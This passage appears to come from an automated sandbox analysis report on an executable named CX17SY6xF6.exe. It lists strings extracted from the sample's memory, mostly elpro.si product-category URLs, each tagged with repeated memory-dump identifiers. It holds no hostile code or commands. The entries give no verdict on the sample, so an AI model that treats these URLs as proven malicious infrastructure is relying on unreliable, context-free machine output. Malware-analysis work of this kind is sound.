00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/zice-temperaturno-obstojne-za-prikl
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracije/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kalibracijski-instrument
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kovcki-za-merilno-opremo
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/krmilne-elektro-omarice/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/alarmne-in-napajalne-enote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/dodatna-oprema-inor/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/izolatorji-signalov-in-izolacijski-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/temperaturni-merilni-pretvorniki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/terenska-ohisja-in-prikazovalniki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kapa
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kond
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/plav
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/filmski-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/regulato
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/koncna-in-magnetna-stikal
